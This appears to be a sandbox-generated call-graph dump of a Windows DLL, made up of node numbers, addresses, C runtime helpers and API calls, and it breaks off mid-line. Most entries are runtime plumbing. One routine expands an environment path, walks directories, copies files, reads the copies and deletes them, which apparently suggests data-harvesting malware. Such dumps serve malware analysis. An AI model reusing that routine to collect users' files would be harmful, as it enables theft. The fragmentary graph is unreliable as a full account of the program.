1fab7a5a 26 API calls 7750->7751 7750->7754 7752 1fab8e4a 7751->7752 7777 1fab9a22 7752->7777 7754->7739 7756 1fab7a7b 7755->7756 7757 1fab7a66 7755->7757 7756->7742 7758 1fab6368 __dosmaperr 20 API calls 7757->7758 7759 1fab7a6b 7758->7759 7760 1fab62ac _abort 26 API calls 7759->7760 7761 1fab7a76 7760->7761 7761->7742 7763 1fabaddd 7762->7763 7764 1fabadf2 7762->7764 7765 1fab6355 __dosmaperr 20 API calls 7763->7765 7766 1fabae2d 7764->7766 7769 1fabae19 7764->7769 7768 1fabade2 7765->7768 7767 1fab6355 __dosmaperr 20 API calls 7766->7767 7770 1fabae32 7767->7770 7771 1fab6368 __dosmaperr 20 API calls 7768->7771 7950 1fabada6 7769->7950 7773 1fab6368 __dosmaperr 20 API calls 7770->7773 7774 1faba070 7771->7774 7775 1fabae3a 7773->7775 7774->7737 7774->7745 7776 1fab62ac _abort 26 API calls 7775->7776 7776->7774 7778 1fab9a2e ___scrt_is_nonwritable_in_current_image 7777->7778 7779 1fab9a4e 7778->7779 7780 1fab9a36 7778->7780 7781 1fab9aec 7779->7781 7786 1fab9a83 7779->7786 7802 1fab6355 7780->7802 7783 1fab6355 __dosmaperr 20 API calls 7781->7783 7785 1fab9af1 7783->7785 7788 1fab6368 __dosmaperr 20 API calls 7785->7788 7805 1fab8c7b RtlEnterCriticalSection 7786->7805 7787 1fab6368 __dosmaperr 20 API calls 7790 1fab9a43 _abort 7787->7790 7791 1fab9af9 7788->7791 7790->7754 7793 1fab62ac _abort 26 API calls 7791->7793 7792 1fab9a89 7794 1fab9aba 7792->7794 7795 1fab9aa5 7792->7795 7793->7790 7806 1fab9b0d 7794->7806 7796 1fab6368 __dosmaperr 20 API calls 7795->7796 7798 1fab9aaa 7796->7798 7800 1fab6355 __dosmaperr 20 API calls 7798->7800 7799 1fab9ab5 7857 1fab9ae4 7799->7857 7800->7799 7803 1fab5b7a _abort 20 API calls 7802->7803 7804 1fab635a 7803->7804 7804->7787 7805->7792 7807 1fab9b3b 7806->7807 7844 1fab9b34 7806->7844 7808 1fab9b3f 7807->7808 7809 1fab9b5e 7807->7809 7810 1fab6355 __dosmaperr 20 API calls 7808->7810 7813 1fab9baf 7809->7813 7814 1fab9b92 7809->7814 7812 1fab9b44 7810->7812 7811 1fab2ada _ValidateLocalCookies 5 API calls 7815 1fab9d15 7811->7815 7816 1fab6368 __dosmaperr 20 API calls 7812->7816 7817 1fab9bc5 7813->7817 7860 1faba00b 7813->7860 7818 1fab6355 __dosmaperr 20 API calls 7814->7818 7815->7799 7819 1fab9b4b 7816->7819 7863 1fab96b2 7817->7863 7822 1fab9b97 7818->7822 7823 1fab62ac _abort 26 API calls 7819->7823 7825 1fab6368 __dosmaperr 20 API calls 7822->7825 7823->7844 7828 1fab9b9f 7825->7828 7826 1fab9c0c 7830 1fab9c20 7826->7830 7831 1fab9c66 WriteFile 7826->7831 7827 1fab9bd3 7832 1fab9bf9 7827->7832 7833 1fab9bd7 7827->7833 7829 1fab62ac _abort 26 API calls 7828->7829 7829->7844 7836 1fab9c28 7830->7836 7837 1fab9c56 7830->7837 7834 1fab9c89 GetLastError 7831->7834 7839 1fab9bef 7831->7839 7875 1fab9492 GetConsoleCP 7832->7875 7838 1fab9ccd 7833->7838 7870 1fab9645 7833->7870 7834->7839 7840 1fab9c2d 7836->7840 7841 1fab9c46 7836->7841 7901 1fab9728 7837->7901 7838->7844 7845 1fab6368 __dosmaperr 20 API calls 7838->7845 7839->7838 7839->7844 7848 1fab9ca9 7839->7848 7840->7838 7886 1fab9807 7840->7886 7893 1fab98f5 7841->7893 7844->7811 7847 1fab9cf2 7845->7847 7850 1fab6355 __dosmaperr 20 API calls 7847->7850 7851 1fab9cb0 7848->7851 7852 1fab9cc4 7848->7852 7850->7844 7853 1fab6368 __dosmaperr 20 API calls 7851->7853 7908 1fab6332 7852->7908 7855 1fab9cb5 7853->7855 7856 1fab6355 __dosmaperr 20 API calls 7855->7856 7856->7844 7949 1fab8c9e RtlLeaveCriticalSection 7857->7949 7859 1fab9aea 7859->7790 7913 1fab9f8d 7860->7913 7935 1fab8dbc 7863->7935 7865 1fab96c2 7866 1fab96c7 7865->7866 7867 1fab5af6 _abort 38 API calls 7865->7867 7866->7826 7866->7827 7868 1fab96ea 7867->7868 7868->7866 7869 1fab9708 GetConsoleMode 7868->7869 7869->7866 7871 1fab969f 7870->7871 7873 1fab966a 7870->7873 7871->7839 7872 1faba181 WriteConsoleW CreateFileW 7872->7873 7873->7871 7873->7872 7874 1fab96a1 GetLastError 7873->7874 7874->7871 7880 1fab9607 7875->7880 7884 1fab94f5 7875->7884 7876 1fab2ada _ValidateLocalCookies 5 API calls 7877 1fab9641 7876->7877 7877->7839 7879 1fab79e6 40 API calls __fassign 7879->7884 7880->7876 7881 1fab957b WideCharToMultiByte 7881->7880 7882 1fab95a1 WriteFile 7881->7882 7883 1fab962a GetLastError 7882->7883 7882->7884 7883->7880 7884->7879 7884->7880 7884->7881 7885 1fab95d2 WriteFile 7884->7885 7944 1fab7c19 7884->7944 7885->7883 7885->7884 7887 1fab9816 7886->7887 7888 1fab98d8 7887->7888 7890 1fab9894 WriteFile 7887->7890 7889 1fab2ada _ValidateLocalCookies 5 API calls 7888->7889 7892 1fab98f1 7889->7892 7890->7887 7891 1fab98da GetLastError 7890->7891 7891->7888 7892->7839 7894 1fab9904 7893->7894 7895 1fab9a0f 7894->7895 7898 1fab9986 WideCharToMultiByte 7894->7898 7899 1fab99bb WriteFile 7894->7899 7896 1fab2ada _ValidateLocalCookies 5 API calls 7895->7896 7897 1fab9a1e 7896->7897 7897->7839 7898->7899 7900 1fab9a07 GetLastError 7898->7900 7899->7894 7899->7900 7900->7895 7906 1fab9737 7901->7906 7902 1fab97ea 7903 1fab2ada _ValidateLocalCookies 5 API calls 7902->7903 7905 1fab9803 7903->7905 7904 1fab97a9 WriteFile 7904->7906 7907 1fab97ec GetLastError 7904->7907 7905->7839 7906->7902 7906->7904 7907->7902 7909 1fab6355 __dosmaperr 20 API calls 7908->7909 7910 1fab633d __dosmaperr 7909->7910 7911 1fab6368 __dosmaperr 20 API calls 7910->7911 7912 1fab6350 7911->7912 7912->7844 7922 1fab8d52 7913->7922 7915 1fab9f9f 7916 1fab9fb8 SetFilePointerEx 7915->7916 7917 1fab9fa7 7915->7917 7919 1fab9fac 7916->7919 7920 1fab9fd0 GetLastError 7916->7920 7918 1fab6368 __dosmaperr 20 API calls 7917->7918 7918->7919 7919->7817 7921 1fab6332 __dosmaperr 20 API calls 7920->7921 7921->7919 7923 1fab8d5f 7922->7923 7925 1fab8d74 7922->7925 7924 1fab6355 __dosmaperr 20 API calls 7923->7924 7926 1fab8d64 7924->7926 7927 1fab6355 __dosmaperr 20 API calls 7925->7927 7929 1fab8d99 7925->7929 7928 1fab6368 __dosmaperr 20 API calls 7926->7928 7930 1fab8da4 7927->7930 7931 1fab8d6c 7928->7931 7929->7915 7932 1fab6368 __dosmaperr 20 API calls 7930->7932 7931->7915 7933 1fab8dac 7932->7933 7934 1fab62ac _abort 26 API calls 7933->7934 7934->7931 7936 1fab8dc9 7935->7936 7937 1fab8dd6 7935->7937 7938 1fab6368 __dosmaperr 20 API calls 7936->7938 7939 1fab8de2 7937->7939 7940 1fab6368 __dosmaperr 20 API calls 7937->7940 7941 1fab8dce 7938->7941 7939->7865 7942 1fab8e03 7940->7942 7941->7865 7943 1fab62ac _abort 26 API calls 7942->7943 7943->7941 7945 1fab5af6 _abort 38 API calls 7944->7945 7946 1fab7c24 7945->7946 7947 1fab7a00 __fassign 38 API calls 7946->7947 7948 1fab7c34 7947->7948 7948->7884 7949->7859 7953 1fabad24 7950->7953 7952 1fabadca 7952->7774 7954 1fabad30 ___scrt_is_nonwritable_in_current_image 7953->7954 7964 1fab8c7b RtlEnterCriticalSection 7954->7964 7956 1fabad3e 7957 1fabad70 7956->7957 7958 1fabad65 7956->7958 7960 1fab6368 __dosmaperr 20 API calls 7957->7960 7965 1fabae4d 7958->7965 7961 1fabad6b 7960->7961 7980 1fabad9a 7961->7980 7963 1fabad8d _abort 7963->7952 7964->7956 7966 1fab8d52 26 API calls 7965->7966 7968 1fabae5d 7966->7968 7967 1fabae63 7983 1fab8cc1 7967->7983 7968->7967 7969 1fabae95 7968->7969 7971 1fab8d52 26 API calls 7968->7971 7969->7967 7972 1fab8d52 26 API calls 7969->7972 7974 1fabae8c 7971->7974 7975 1fabaea1 CloseHandle 7972->7975 7978 1fab8d52 26 API calls 7974->7978 7975->7967 7979 1fabaead GetLastError 7975->7979 7976 1fabaedd 7976->7961 7977 1fab6332 __dosmaperr 20 API calls 7977->7976 7978->7969 7979->7967 7992 1fab8c9e RtlLeaveCriticalSection 7980->7992 7982 1fabada4 7982->7963 7984 1fab8cd0 7983->7984 7985 1fab8d37 7983->7985 7984->7985 7991 1fab8cfa 7984->7991 7986 1fab6368 __dosmaperr 20 API calls 7985->7986 7987 1fab8d3c 7986->7987 7988 1fab6355 __dosmaperr 20 API calls 7987->7988 7989 1fab8d27 7988->7989 7989->7976 7989->7977 7990 1fab8d21 SetStdHandle 7990->7989 7991->7989 7991->7990 7992->7982 7993->7748 7994->7728 7995 1fab284f 7996 1fab2882 std::exception::exception 27 API calls 7995->7996 7997 1fab285d 7996->7997 7998 1fab724e GetProcessHeap 7999 1fabaf43 8000 1fabaf59 7999->8000 8001 1fabaf4d 7999->8001 8001->8000 8002 1fabaf52 CloseHandle 8001->8002 8002->8000 8003 1fab8640 8006 1fab8657 8003->8006 8007 1fab8679 8006->8007 8008 1fab8665 8006->8008 8009 1fab8693 8007->8009 8010 1fab8681 8007->8010 8011 1fab6368 __dosmaperr 20 API calls 8008->8011 8015 1fab54a7 __fassign 38 API calls 8009->8015 8018 1fab8652 8009->8018 8012 1fab6368 __dosmaperr 20 API calls 8010->8012 8013 1fab866a 8011->8013 8014 1fab8686 8012->8014 8016 1fab62ac _abort 26 API calls 8013->8016 8017 1fab62ac _abort 26 API calls 8014->8017 8015->8018 8016->8018 8017->8018 6989 1fab7bc7 6991 1fab7bd3 ___scrt_is_nonwritable_in_current_image 6989->6991 6990 1fab7c0a _abort 6991->6990 6997 1fab5671 RtlEnterCriticalSection 6991->6997 6993 1fab7be7 6994 1fab7f86 __fassign 20 API calls 6993->6994 6995 1fab7bf7 6994->6995 6998 1fab7c10 6995->6998 6997->6993 7001 1fab56b9 RtlLeaveCriticalSection 6998->7001 7000 1fab7c17 7000->6990 7001->7000 7002 1faba1c6 IsProcessorFeaturePresent 8019 1faba945 8021 1faba96d 8019->8021 8020 1faba9a5 8021->8020 8022 1faba99e 8021->8022 8023 1faba997 8021->8023 8028 1fabaa00 8022->8028 8024 1fabaa17 21 API calls 8023->8024 8026 1faba99c 8024->8026 8029 1fabaa20 8028->8029 8030 1fabb19b __startOneArgErrorHandling 21 API calls 8029->8030 8031 1faba9a3 8030->8031 5945 1fab1c5b 5946 1fab1c6b ___scrt_fastfail 5945->5946 5949 1fab12ee 5946->5949 5948 1fab1c87 5950 1fab1324 ___scrt_fastfail 5949->5950 5951 1fab13b7 GetEnvironmentVariableW 5950->5951 5975 1fab10f1 5951->5975 5954 1fab10f1 57 API calls 5955 1fab1465 5954->5955 5956 1fab10f1 57 API calls 5955->5956 5957 1fab1479 5956->5957 5958 1fab10f1 57 API calls 5957->5958 5959 1fab148d 5958->5959 5960 1fab10f1 57 API calls 5959->5960 5961 1fab14a1 5960->5961 5962 1fab10f1 57 API calls 5961->5962 5963 1fab14b5 lstrlenW 5962->5963 5964 1fab14d9 lstrlenW 5963->5964 5965 1fab14d2 5963->5965 5966 1fab10f1 57 API calls 5964->5966 5965->5948 5967 1fab1501 lstrlenW lstrcatW 5966->5967 5968 1fab10f1 57 API calls 5967->5968 5969 1fab1539 lstrlenW lstrcatW 5968->5969 5970 1fab10f1 57 API calls 5969->5970 5971 1fab156b lstrlenW lstrcatW 5970->5971 5972 1fab10f1 57 API calls 5971->5972 5973 1fab159d lstrlenW lstrcatW 5972->5973 5974 1fab10f1 57 API calls 5973->5974 5974->5965 5976 1fab1118 ___scrt_fastfail 5975->5976 5977 1fab1129 lstrlenW 5976->5977 5988 1fab2c40 5977->5988 5980 1fab1168 lstrlenW 5981 1fab1177 lstrlenW FindFirstFileW 5980->5981 5982 1fab11e1 5981->5982 5983 1fab11a0 5981->5983 5982->5954 5984 1fab11c7 FindNextFileW 5983->5984 5987 1fab11aa 5983->5987 5984->5983 5986 1fab11da FindClose 5984->5986 5986->5982 5987->5984 5990 1fab1000 5987->5990 5989 1fab1148 lstrcatW lstrlenW 5988->5989 5989->5980 5989->5981 5991 1fab1022 ___scrt_fastfail 5990->5991 5992 1fab10af 5991->5992 5993 1fab102f lstrcatW lstrlenW 5991->5993 5996 1fab10b5 lstrlenW 5992->5996 6006 1fab10ad 5992->6006 5994 1fab106b lstrlenW 5993->5994 5995 1fab105a lstrlenW 5993->5995 6007 1fab1e89 lstrlenW 5994->6007 5995->5994 6021 1fab1e16 5996->6021 5999 1fab10ca 6002 1fab1e89 5 API calls 5999->6002 5999->6006 6000 1fab1088 GetFileAttributesW 6001 1fab109c 6000->6001 6000->6006 6001->6006 6013 1fab173a 6001->6013 6003 1fab10df 6002->6003 6026 1fab11ea 6003->6026 6006->5987 6008 1fab2c40 ___scrt_fastfail 6007->6008 6009 1fab1ea7 lstrcatW lstrlenW 6008->6009 6010 1fab1ec2 6009->6010 6011 1fab1ed1 lstrcatW 6009->6011 6010->6011 6012 1fab1ec7 lstrlenW 6010->6012 6011->6000 6012->6011 6014 1fab1747 ___scrt_fastfail 6013->6014 6041 1fab1cca 6014->6041 6017 1fab199f 6017->6006 6020 1fab1824 ___scrt_fastfail _strlen 6020->6017 6061 1fab15da 6020->6061 6022 1fab1e29 6021->6022 6023 1fab1e4c 6021->6023 6022->6023 6024 1fab1e2d lstrlenW 6022->6024 6023->5999 6024->6023 6025 1fab1e3f lstrlenW 6024->6025 6025->6023 6027 1fab120e ___scrt_fastfail 6026->6027 6028 1fab1e89 5 API calls 6027->6028 6029 1fab1220 GetFileAttributesW 6028->6029 6030 1fab1246 6029->6030 6031 1fab1235 6029->6031 6032 1fab1e89 5 API calls 6030->6032 6031->6030 6034 1fab173a 35 API calls 6031->6034 6033 1fab1258 6032->6033 6035 1fab10f1 56 API calls 6033->6035 6034->6030 6036 1fab126d 6035->6036 6037 1fab1e89 5 API calls 6036->6037 6038 1fab127f ___scrt_fastfail 6037->6038 6039 1fab10f1 56 API calls 6038->6039 6040 1fab12e6 6039->6040 6040->6006 6042 1fab1cf1 ___scrt_fastfail 6041->6042 6043 1fab1d0f CopyFileW CreateFileW 6042->6043 6044 1fab1d55 GetFileSize 6043->6044 6045 1fab1d44 DeleteFileW 6043->6045 6046 1fab1ede 22 API calls 6044->6046 6050 1fab1808 6045->6050 6047 1fab1d66 ReadFile 6046->6047 6048 1fab1d7d CloseHandle DeleteFileW 6047->6048 6049 1fab1d94 CloseHandle DeleteFileW 6047->6049 6048->6050 6049->6050 6050->6017 6051 1fab1ede 6050->6051 6055 1fab222f 6051->6055 6053 1fab224e 6053->6020 6055->6053 6057 1fab2250 6055->6057 6069 1fab474f 6055->6069 6074 1fab47e5 6055->6074 6056 1fab2908 6058 1fab35d2 __CxxThrowException@8 RaiseException 6056->6058 6057->6056 6081 1fab35d2 6057->6081 6059 1fab2925 6058->6059 6059->6020 6062 1fab160c _strcat _strlen 6061->6062 6063 1fab163c lstrlenW 6062->6063 6169 1fab1c9d 6063->6169 6065 1fab1655 lstrcatW lstrlenW 6066 1fab1678 6065->6066 6067 1fab167e lstrcatW 6066->6067 6068 1fab1693 ___scrt_fastfail 6066->6068 6067->6068 6068->6020 6084 1fab4793 6069->6084 6072 1fab478f 6072->6055 6073 1fab4765 6090 1fab2ada 6073->6090 6079 1fab56d0 _abort 6074->6079 6075 1fab570e 6103 1fab6368 6075->6103 6076 1fab56f9 RtlAllocateHeap 6078 1fab570c 6076->6078 6076->6079 6078->6055 6079->6075 6079->6076 6080 1fab474f _abort 7 API calls 6079->6080 6080->6079 6083 1fab35f2 RaiseException 6081->6083 6083->6056 6085 1fab479f ___scrt_is_nonwritable_in_current_image 6084->6085 6097 1fab5671 RtlEnterCriticalSection 6085->6097 6087 1fab47aa 6098 1fab47dc 6087->6098 6089 1fab47d1 _abort 6089->6073 6091 1fab2ae3 6090->6091 6092 1fab2ae5 IsProcessorFeaturePresent 6090->6092 6091->6072 6094 1fab2b58 6092->6094 6102 1fab2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6094->6102 6096 1fab2c3b 6096->6072 6097->6087 6101 1fab56b9 RtlLeaveCriticalSection 6098->6101 6100 1fab47e3 6100->6089 6101->6100 6102->6096 6106 1fab5b7a GetLastError 6103->6106 6107 1fab5b93 6106->6107 6110 1fab5b99 6106->6110 6125 1fab5e08 6107->6125 6113 1fab5bf0 SetLastError 6110->6113 6132 1fab637b 6110->6132 6112 1fab5bb3 6139 1fab571e 6112->6139 6115 1fab5bf9 6113->6115 6115->6078 6118 1fab5bb9 6120 1fab5be7 SetLastError 6118->6120 6119 1fab5bcf 6152 1fab593c 6119->6152 6120->6115 6123 1fab571e _free 17 API calls 6124 1fab5be0 6123->6124 6124->6113 6124->6120 6157 1fab5c45 6125->6157 6127 1fab5e2f 6128 1fab5e47 TlsGetValue 6127->6128 6129 1fab5e3b 6127->6129 6128->6129 6130 1fab2ada _ValidateLocalCookies 5 API calls 6129->6130 6131 1fab5e58 6130->6131 6131->6110 6137 1fab6388 _abort 6132->6137 6133 1fab63c8 6136 1fab6368 __dosmaperr 19 API calls 6133->6136 6134 1fab63b3 RtlAllocateHeap 6135 1fab5bab 6134->6135 6134->6137 6135->6112 6145 1fab5e5e 6135->6145 6136->6135 6137->6133 6137->6134 6138 1fab474f _abort 7 API calls 6137->6138 6138->6137 6140 1fab5729 HeapFree 6139->6140 6141 1fab5752 __dosmaperr 6139->6141 6140->6141 6142 1fab573e 6140->6142 6141->6118 6143 1fab6368 __dosmaperr 18 API calls 6142->6143 6144 1fab5744 GetLastError 6143->6144 6144->6141 6146 1fab5c45 _abort 5 API calls 6145->6146 6147 1fab5e85 6146->6147 6148 1fab5ea0 TlsSetValue 6147->6148 6151 1fab5e94 6147->6151 6148->6151 6149 1fab2ada _ValidateLocalCookies 5 API calls 6150 1fab5bc8 6149->6150 6150->6112 6150->6119 6151->6149 6163 1fab5914 6152->6163 6160 1fab5c71 6157->6160 6162 1fab5c75 __crt_fast_encode_pointer 6157->6162 6158 1fab5c95 6161 1fab5ca1 GetProcAddress 6158->6161 6158->6162 6159 1fab5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6159->6160 6160->6158 6160->6159 6160->6162 6161->6162 6162->6127 6164 1fab5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6163->6164 6165 1fab5938 6164->6165 6166 1fab58c4 6165->6166 6167 1fab5758 _abort 20 API calls 6166->6167 6168 1fab58e8 6167->6168 6168->6123 6170 1fab1ca6 _strlen 6169->6170 6170->6065 7003 1fab20db 7006 1fab20e7 ___scrt_is_nonwritable_in_current_image 7003->7006 7004 1fab20f6 7005 1fab2110 dllmain_raw 7005->7004 7007 1fab212a 7005->7007 7006->7004 7006->7005 7009 1fab210b 7006->7009 7016 1fab1eec 7007->7016 7009->7004 7010 1fab2177 7009->7010 7014 1fab1eec 31 API calls 7009->7014 7010->7004 7011 1fab1eec 31 API calls 7010->7011 7012 1fab218a 7011->7012 7012->7004 7013 1fab2193 dllmain_raw 7012->7013 7013->7004 7015 1fab216d dllmain_raw 7014->7015 7015->7010 7017 1fab1f2a dllmain_crt_process_detach 7016->7017 7018 1fab1ef7 7016->7018 7025 1fab1f06 7017->7025 7019 1fab1f1c dllmain_crt_process_attach 7018->7019 7020 1fab1efc 7018->7020 7019->7025 7021 1fab1f12 7020->7021 7022 1fab1f01 7020->7022 7031 1fab23ec 7021->7031 7022->7025 7026 1fab240b 7022->7026 7025->7009 7039 1fab53e5 7026->7039 7150 1fab3513 7031->7150 7034 1fab23f5 7034->7025 7037 1fab2408 7037->7025 7038 1fab351e 7 API calls 7038->7034 7045 1fab5aca 7039->7045 7042 1fab351e 7121 1fab3820 7042->7121 7044 1fab2415 7044->7025 7046 1fab5ad4 7045->7046 7049 1fab2410 7045->7049 7047 1fab5e08 _abort 11 API calls 7046->7047 7048 1fab5adb 7047->7048 7048->7049 7050 1fab5e5e _abort 11 API calls 7048->7050 7049->7042 7051 1fab5aee 7050->7051 7053 1fab59b5 7051->7053 7054 1fab59d0 7053->7054 7055 1fab59c0 7053->7055 7054->7049 7059 1fab59d6 7055->7059 7058 1fab571e _free 20 API calls 7058->7054 7060 1fab59e9 7059->7060 7061 1fab59ef 7059->7061 7062 1fab571e _free 20 API calls 7060->7062 7063 1fab571e _free 20 API calls 7061->7063 7062->7061 7064 1fab59fb 7063->7064 7065 1fab571e _free 20 API calls 7064->7065 7066 1fab5a06 7065->7066 7067 1fab571e _free 20 API calls 7066->7067 7068 1fab5a11 7067->7068 7069 1fab571e _free 20 API calls 7068->7069 7070 1fab5a1c 7069->7070 7071 1fab571e _free 20 API calls 7070->7071 7072 1fab5a27 7071->7072 7073 1fab571e _free 20 API calls 7072->7073 7074 1fab5a32 7073->7074 7075 1fab571e _free 20 API calls 7074->7075 7076 1fab5a3d 7075->7076 7077 1fab571e _free 20 API calls 7076->7077 7078 1fab5a48 7077->7078 7079 1fab571e _free 20 API calls 7078->7079 7080 1fab5a56 7079->7080 7085 1fab589c 7080->7085 7091 1fab57a8 7085->7091 7087 1fab58c0 7088 1fab58ec 7087->7088 7104 1fab5809 7088->7104 7090 1fab5910 7090->7058 7092 1fab57b4 ___scrt_is_nonwritable_in_current_image 7091->7092 7099 1fab5671 RtlEnterCriticalSection 7092->7099 7094 1fab57e8 7100 1fab57fd 7094->7100 7096 1fab57be 7096->7094 7098 1fab571e _free 20 API calls 7096->7098 7097 1fab57f5 _abort 7097->7087 7098->7094 7099->7096 7103 1fab56b9 RtlLeaveCriticalSection 7100->7103 7102 1fab5807 7102->7097 7103->7102 7105 1fab5815 ___scrt_is_nonwritable_in_current_image 7104->7105 7112 1fab5671 RtlEnterCriticalSection 7105->7112 7107 1fab581f 7113 1fab5a7f 7107->7113 7109 1fab5832 7117 1fab5848 7109->7117 7111 1fab5840 _abort 7111->7090 7112->7107 7114 1fab5a8e __fassign 7113->7114 7115 1fab5ab5 __fassign 7113->7115 7114->7115 7116 1fab7cc2 __fassign 20 API calls 7114->7116 7115->7109 7116->7115 7120 1fab56b9 RtlLeaveCriticalSection 7117->7120 7119 1fab5852 7119->7111 7120->7119 7122 1fab382d 7121->7122 7126 1fab384b ___vcrt_freefls@4 7121->7126 7123 1fab383b 7122->7123 7127 1fab3b67 7122->7127 7132 1fab3ba2 7123->7132 7126->7044 7137 1fab3a82 7127->7137 7129 1fab3b81 7130 1fab3b99 TlsGetValue 7129->7130 7131 1fab3b8d 7129->7131 7130->7131 7131->7123 7133 1fab3a82 try_get_function 5 API calls 7132->7133 7134 1fab3bbc 7133->7134 7135 1fab3bd7 TlsSetValue 7134->7135 7136 1fab3bcb 7134->7136 7135->7136 7136->7126 7138 1fab3aaa 7137->7138 7142 1fab3aa6 __crt_fast_encode_pointer 7137->7142 7138->7142 7143 1fab39be 7138->7143 7141 1fab3ac4 GetProcAddress 7141->7142 7142->7129 7148 1fab39cd try_get_first_available_module 7143->7148 7144 1fab3a77 7144->7141 7144->7142 7145 1fab39ea LoadLibraryExW 7146 1fab3a05 GetLastError 7145->7146 7145->7148 7146->7148 7147 1fab3a60 FreeLibrary 7147->7148 7148->7144 7148->7145 7148->7147 7149 1fab3a38 LoadLibraryExW 7148->7149 7149->7148 7156 1fab3856 7150->7156 7152 1fab23f1 7152->7034 7153 1fab53da 7152->7153 7154 1fab5b7a _abort 20 API calls 7153->7154 7155 1fab23fd 7154->7155 7155->7037 7155->7038 7157 1fab385f 7156->7157 7158 1fab3862 GetLastError 7156->7158 7157->7152 7159 1fab3b67 ___vcrt_FlsGetValue 6 API calls 7158->7159 7160 1fab3877 7159->7160 7161 1fab38dc SetLastError 7160->7161 7162 1fab3ba2 ___vcrt_FlsSetValue 6 API calls 7160->7162 7167 1fab3896 7160->7167 7161->7152 7163 1fab3890 7162->7163 7164 1fab38b8 7163->7164 7165 1fab3ba2 ___vcrt_FlsSetValue 6 API calls 7163->7165 7163->7167 7166 1fab3ba2 ___vcrt_FlsSetValue 6 API calls 7164->7166 7164->7167 7165->7164 7166->7167 7167->7161 7168 1fab4bdd 7169 1fab4c08 7168->7169 7170 1fab4bec 7168->7170 7172 1fab6d60 51 API calls 7169->7172 7170->7169 7171 1fab4bf2 7170->7171 7173 1fab6368 __dosmaperr 20 API calls 7171->7173 7174 1fab4c0f GetModuleFileNameA 7172->7174 7176 1fab4bf7 7173->7176 7175 1fab4c33 7174->7175 7191 1fab4d01 7175->7191 7177 1fab62ac _abort 26 API calls 7176->7177 7189 1fab4c01 7177->7189 7180 1fab4e76 20 API calls 7181 1fab4c5d 7180->7181 7182 1fab4c72 7181->7182 7183 1fab4c66 7181->7183 7185 1fab4d01 38 API calls 7182->7185 7184 1fab6368 __dosmaperr 20 API calls 7183->7184 7186 1fab4c6b 7184->7186 7187 1fab4c88 7185->7187 7188 1fab571e _free 20 API calls 7186->7188 7187->7186 7190 1fab571e _free 20 API calls 7187->7190 7188->7189 7190->7186 7193 1fab4d26 7191->7193 7195 1fab4d86 7193->7195 7197 1fab70eb 7193->7197 7194 1fab4c50 7194->7180 7195->7194 7196 1fab70eb 38 API calls 7195->7196 7196->7195 7200 1fab7092 7197->7200 7201 1fab54a7 __fassign 38 API calls 7200->7201 7202 1fab70a6 7201->7202 7202->7193 8032 1fab5351 8033 1fab5360 8032->8033 8037 1fab5374 8032->8037 8035 1fab571e _free 20 API calls 8033->8035 8033->8037 8034 1fab571e _free 20 API calls 8036 1fab5386 8034->8036 8035->8037 8038 1fab571e _free 20 API calls 8036->8038 8037->8034 8039 1fab5399 8038->8039 8040 1fab571e _free 20 API calls 8039->8040 8041 1fab53aa 8040->8041 8042 1fab571e _free 20 API calls 8041->8042 8043 1fab53bb 8042->8043 7203 1fab36d0 7204 1fab36e2 7203->7204 7206 1fab36f0 @_EH4_CallFilterFunc@8 7203->7206 7205 1fab2ada _ValidateLocalCookies 5 API calls 7204->7205 7205->7206 7207 1fab4ed7 7208 1fab6d60 51 API calls 7207->7208 7209 1fab4ee9 7208->7209 7218 1fab7153 GetEnvironmentStringsW 7209->7218 7212 1fab4ef4 7214 1fab571e _free 20 API calls 7212->7214 7215 1fab4f29 7214->7215 7216 1fab571e _free 20 API calls 7216->7212 7217 1fab4eff 7217->7216 7219 1fab716a 7218->7219 7220 1fab71bd 7218->7220 7221 1fab7170 WideCharToMultiByte 7219->7221 7222 1fab4eee 7220->7222 7223 1fab71c6 FreeEnvironmentStringsW 7220->7223 7221->7220 7224 1fab718c 7221->7224 7222->7212 7230 1fab4f2f 7222->7230 7223->7222 7225 1fab56d0 21 API calls 7224->7225 7226 1fab7192 7225->7226 7227 1fab7199 WideCharToMultiByte 7226->7227 7228 1fab71af 7226->7228 7227->7228 7229 1fab571e _free 20 API calls 7228->7229 7229->7220 7231 1fab4f44 7230->7231 7232 1fab637b _abort 20 API calls 7231->7232 7238 1fab4f6b 7232->7238 7233 1fab571e _free 20 API calls 7235 1fab4fe9 7233->7235 7234 1fab4fcf 7234->7233 7235->7217 7236 1fab637b _abort 20 API calls 7236->7238 7237 1fab4fd1 7240 1fab5000 20 API calls 7237->7240 7238->7234 7238->7236 7238->7237 7243 1fab4ff3 7238->7243 7245 1fab571e _free 20 API calls 7238->7245 7247 1fab544d 7238->7247 7241 1fab4fd7 7240->7241 7242 1fab571e _free 20 API calls 7241->7242 7242->7234 7244 1fab62bc _abort 11 API calls 7243->7244 7246 1fab4fff 7244->7246 7245->7238 7248 1fab545a 7247->7248 7250 1fab5468 7247->7250 7248->7250 7253 1fab547f 7248->7253 7249 1fab6368 __dosmaperr 20 API calls 7251 1fab5470 7249->7251 7250->7249 7252 1fab62ac _abort 26 API calls 7251->7252 7254 1fab547a 7252->7254 7253->7254 7255 1fab6368 __dosmaperr 20 API calls 7253->7255 7254->7238 7255->7251 7256 1fab73d5 7257 1fab73e1 ___scrt_is_nonwritable_in_current_image 7256->7257 7268 1fab5671 RtlEnterCriticalSection 7257->7268 7259 1fab73e8 7269 1fab8be3 7259->7269 7261 1fab73f7 7262 1fab7406 7261->7262 7282 1fab7269 GetStartupInfoW 7261->7282 7293 1fab7422 7262->7293 7266 1fab7417 _abort 7268->7259 7270 1fab8bef ___scrt_is_nonwritable_in_current_image 7269->7270 7271 1fab8bfc 7270->7271 7272 1fab8c13 7270->7272 7273 1fab6368 __dosmaperr 20 API calls 7271->7273 7296 1fab5671 RtlEnterCriticalSection 7272->7296 7275 1fab8c01 7273->7275 7276 1fab62ac _abort 26 API calls 7275->7276 7277 1fab8c0b _abort 7276->7277 7277->7261 7278 1fab8c4b 7304 1fab8c72 7278->7304 7280 1fab8c1f 7280->7278 7297 1fab8b34 7280->7297 7283 1fab7286 7282->7283 7285 1fab7318 7282->7285 7284 1fab8be3 27 API calls 7283->7284 7283->7285 7286 1fab72af 7284->7286 7288 1fab731f 7285->7288 7286->7285 7287 1fab72dd GetFileType 7286->7287 7287->7286 7289 1fab7326 7288->7289 7290 1fab7369 GetStdHandle 7289->7290 7291 1fab73d1 7289->7291 7292 1fab737c GetFileType 7289->7292 7290->7289 7291->7262 7292->7289 7308 